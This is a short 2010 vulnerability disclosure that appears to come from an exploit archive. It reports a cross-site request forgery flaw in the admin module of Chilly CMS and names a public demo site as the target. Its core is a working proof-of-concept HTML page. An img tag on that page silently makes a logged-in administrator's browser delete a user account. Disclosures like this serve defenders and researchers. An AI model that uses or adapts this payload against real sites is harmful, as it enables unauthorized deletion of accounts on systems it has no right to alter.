Chilly CMS CSRF Vulnerability
Posted on 16 March 2010
============================= Chilly CMS CSRF Vulnerability ============================= # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Software chilly_CMS # Category CMS / Portals # Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php # Plateform php # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team) # Proof of concept # Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS Script to Delete the Admin user through Cross Site request forgery . ................................................................................................................ <html> <body> <img src=http://demo.opensourcecms.com/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] /> </body> </html> . .................................................................................................................. After execution refresh the page and u can see that a added content is deleted automatically. # ~ - [ [ : Inj3ct0r : ] ]
